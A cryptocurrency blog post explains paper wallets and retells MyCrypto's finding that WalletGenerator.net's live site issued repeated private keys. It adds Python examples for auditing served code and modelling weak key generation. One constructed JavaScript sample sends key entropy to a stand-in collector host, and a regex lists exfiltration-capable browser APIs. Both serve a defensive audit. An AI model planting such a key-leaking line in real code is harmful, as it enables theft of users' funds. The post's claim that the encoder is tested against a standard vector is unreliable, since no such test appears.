Bitcoin Paper Wallet Vulnerability That Gave the Same Key to Multiple Users. "Beware"

What is a Paper Wallet?
A paper wallet is an offline mechanism for storing cryptocurrency such as Bitcoin: the private key and the matching Bitcoin address are printed on paper and kept away from any networked device. Physical wallets, including the "physical Bitcoins" often pictured in media coverage with a novel coin design and the private key printed on paper, plastic or metal, are a variant of the same idea. Properly constructed, and with the precautions below, a paper wallet is one of the safer ways to hold Bitcoin, because the key never sits on an online machine. Its weak points are the machine that generates the key and the randomness that machine uses, which is exactly what the incident described further down is about.

Follow the security checklist recommendations
First, download the generator's source code from GitHub and open the index.html file directly from your own computer instead of using the live site. It is far too easy to sneak malicious code into 6,000+ lines of JavaScript that leaks your private key, and you do not want to see your funds stolen. Having the code under version control makes it much easier to cross-check what actually runs against what was published. For extra security, disconnect from the Internet while generating your wallet.
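The cross-check the checklist asks for, written in Python as an added example (this is not WalletGenerator.net's tooling): hash the served page against the repository copy, list any lines the live copy adds, and flag those that call a browser API able to send data somewhere. The two JavaScript snippets embedded below are constructed, and the collector URL in the live copy is hypothetical; the actual discrepancy later found on WalletGenerator.net was deterministic key generation rather than exfiltration, so the flag list is a first pass for a reviewer, not a complete audit.

```python
"""Added example (not WalletGenerator.net's own tooling): check that the code a
site serves matches the audited copy in its repository, and flag added lines
that could move a private key off the machine."""
import difflib
import hashlib
import re
import urllib.request

# Browser APIs that can send data to a remote host. A line present in the live
# copy but absent from the repository that uses one of these is exactly the
# "evil code" the checklist warns about.
EXFIL_APIS = re.compile(
    r"XMLHttpRequest|\bfetch\s*\(|sendBeacon|new\s+Image\s*\(|WebSocket\s*\(|\.src\s*=",
    re.IGNORECASE,
)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def fetch_live(url: str, timeout: float = 20) -> bytes:
    """Download the page the browser would actually run (needs network)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def compare_sources(repo: bytes, live: bytes) -> dict:
    """Hash both copies, then list the lines the live copy adds and which of
    those touch a network-capable API."""
    repo_lines = repo.decode("utf-8", "replace").splitlines()
    live_lines = live.decode("utf-8", "replace").splitlines()
    diff = difflib.unified_diff(
        repo_lines, live_lines, fromfile="repo", tofile="live", lineterm="", n=0
    )
    added = [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]
    return {
        "identical": sha256_hex(repo) == sha256_hex(live),
        "repo_sha256": sha256_hex(repo),
        "live_sha256": sha256_hex(live),
        "added_lines": added,
        "suspicious": [line for line in added if EXFIL_APIS.search(line)],
    }


# Constructed sample: the repository's generator function, and a live copy with
# one extra line that leaks the entropy to a hypothetical collector host.
REPO_JS = b"""function generateKey() {
  var entropy = window.crypto.getRandomValues(new Uint8Array(32));
  return toWif(entropy);
}
"""
LIVE_JS = b"""function generateKey() {
  var entropy = window.crypto.getRandomValues(new Uint8Array(32));
  new Image().src = "https://collector.example/k?" + toHex(entropy);
  return toWif(entropy);
}
"""

if __name__ == "__main__":
    report = compare_sources(REPO_JS, LIVE_JS)
    print("identical:", report["identical"])
    for line in report["suspicious"]:
        print("SUSPICIOUS added line:", line.strip())
```

In real use `fetch_live` pulls the page the browser gets and the repository copy comes from a pinned commit in a local checkout; any difference at all, flagged or not, is reason not to put funds on a key generated from that page.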

Step 1. Generate new address
Choose your currency and click on the "Generate new address" button.

Step 2. Print the Paper Wallet
Click the Paper Wallet tab and print the page at a high-quality setting. Never save the page as a PDF to print later: a file on a computer is far more exposed to theft than a piece of paper.

Step 3. Fold the Paper Wallet
Fold your new paper wallet along the printed lines: in half lengthwise, then in three widthwise.

You can insert one side inside the other to lock the wallet.

Step 4. Share your public address
Use your public address to receive money from other crypto-currency users. You can share your public address as much as you want.

Step 5. Keep your private key secret
The private key is literally the key to your coins: anyone who obtains it can withdraw the funds currently in the wallet and any funds deposited into it later.

Please test spending a small amount before receiving any large payments.

Computer Researcher Finds Wallet Vulnerability That Gave Same Key to Multiple Users.

Online cryptocurrency paper wallet generator WalletGenerator.net previously ran on code that issued the same private/public key pairs to multiple users. The vulnerability was described in a blog post by security researcher Harry Denley of MyCrypto on May 24.

According to the post, the flawed code was live by August 2018 and was only patched on May 23. The code running on the website is supposed to match the open-source, audited version on GitHub, but the two were found to differ. After examining the live code, Denley concluded that on the live site keys were generated deterministically rather than randomly.

In one of MyCrypto's tests between May 18 and 23, they used the website's bulk generator to request 1,000 keys. The GitHub version returned 1,000 unique keys, but the live code returned only 120 unique keys. Repeated runs of the bulk generator reportedly always yielded 120 unique keys instead of 1,000, regardless of browser refreshes, VPN changes or switching users.

Randomness is needed to generate the key pairs for the paper wallets to be secure. As the post puts it:

“ELI5: When generating a key, you take a super-random number, turn it into the private key, and turn that into the public key / address. However, if the ‘super-random’ number is always ‘5,’ the private key that is generated will always be the same. This is why it’s so important that the super-random number is actually random…not ‘5.’”
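To make the bulk test and the ELI5 above concrete, here is an added Python model. It is not the site's code and not MyCrypto's test harness, and the page does not show the real flawed generator, so the weak generator is a constructed stand-in that cycles through 120 fixed entropy values; a CSPRNG-backed generator stands in for the GitHub version. Each entropy value is turned into a WIF private key the way a paper wallet prints it, the audit counts unique keys out of 1,000, and a second check counts keys that two independent users end up sharing.

```python
"""Model of the WalletGenerator.net failure and the bulk check that exposed it.
Added example, not the site's or MyCrypto's code; the weak generator is a
constructed stand-in, since the page does not show the real flawed code."""
import hashlib
import secrets

# secp256k1 group order: a valid Bitcoin private key is an integer in [1, N-1].
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
B58_ALPHABET = b"123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def private_key_from_entropy(entropy: bytes) -> int:
    """The 'super-random number -> private key' step from the ELI5: hash the
    entropy to a fixed width and reduce it into the valid scalar range.
    Same entropy in, same key out, which is the whole problem when the
    entropy is not random."""
    h = int.from_bytes(hashlib.sha256(entropy).digest(), "big")
    return h % (SECP256K1_N - 1) + 1


def base58check(payload: bytes) -> str:
    """Bitcoin Base58Check: payload || first 4 bytes of SHA256(SHA256(payload))."""
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    data = payload + checksum
    n = int.from_bytes(data, "big")
    digits = bytearray()
    while n:
        n, rem = divmod(n, 58)
        digits.append(B58_ALPHABET[rem])
    pad = len(data) - len(data.lstrip(b"\x00"))  # each leading 0x00 byte -> '1'
    return (B58_ALPHABET[:1] * pad + bytes(reversed(digits))).decode()


def to_wif(priv: int) -> str:
    """Mainnet uncompressed WIF (version byte 0x80): the string a paper wallet
    generator prints next to the private-key QR code."""
    return base58check(b"\x80" + priv.to_bytes(32, "big"))


class WeakGenerator:
    """Constructed stand-in for the flawed live code. Its 'entropy' is not
    random: it cycles through a pool of 120 fixed values, so every user,
    browser and session is handed the same 120 keys however many it asks for."""

    def __init__(self, pool_size: int = 120):
        self.pool_size = pool_size
        self.calls = 0

    def entropy(self) -> bytes:
        self.calls += 1
        return (self.calls % self.pool_size).to_bytes(4, "big")


class StrongGenerator:
    """What the generator should do: 32 fresh bytes from the OS CSPRNG per key."""

    def entropy(self) -> bytes:
        return secrets.token_bytes(32)


def bulk_generate(gen, count: int = 1000) -> list:
    """The site's bulk generator: `count` WIF keys from one generator."""
    return [to_wif(private_key_from_entropy(gen.entropy())) for _ in range(count)]


def audit_bulk(keys: list) -> dict:
    """MyCrypto's check: request many keys and count the distinct ones.
    A sound generator returns as many unique keys as were requested."""
    unique = len(set(keys))
    return {"requested": len(keys), "unique": unique, "safe": unique == len(keys)}


def shared_keys(keys_a: list, keys_b: list) -> int:
    """Keys two independent users have in common. Anything above zero means
    the two users can spend each other's funds."""
    return len(set(keys_a) & set(keys_b))


if __name__ == "__main__":
    for name, gen in (("weak", WeakGenerator()), ("strong", StrongGenerator())):
        print(name, audit_bulk(bulk_generate(gen, 1000)))
    print("keys shared by two weak users:",
          shared_keys(bulk_generate(WeakGenerator(), 1000), bulk_generate(WeakGenerator(), 1000)))
```

The weak path reproduces the symptom in the article: 1,000 requests, 120 unique keys, and a second "user" receiving exactly the same 120. The strong path returns 1,000 distinct keys, and two independent users share none. The WIF encoder is checked against the standard Bitcoin test vector so the key material it prints is the real format, not a placeholder.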

WalletGenerator patched the determinism problem after MyCrypto reached out in the middle of its investigation. WalletGenerator purportedly responded afterward that the allegations could not be verified, and even asked the correspondent whether MyCrypto was a “phishing website.”

MyCrypto added that users who generated key pairs after August 17, 2018 should immediately move their funds to a different wallet, and recommended against using WalletGenerator.net at all.

As previously reported by Cointelegraph, a so-called “blockchain bandit” made off with around 45,000 ether (ETH) by guessing weak private keys on the Ethereum blockchain.
Credit to CoinTelegraph

Please leave us a comment if you have ever used a paper wallet or are planning to.
Don't forget to subscribe to stay up to date with crypto news.

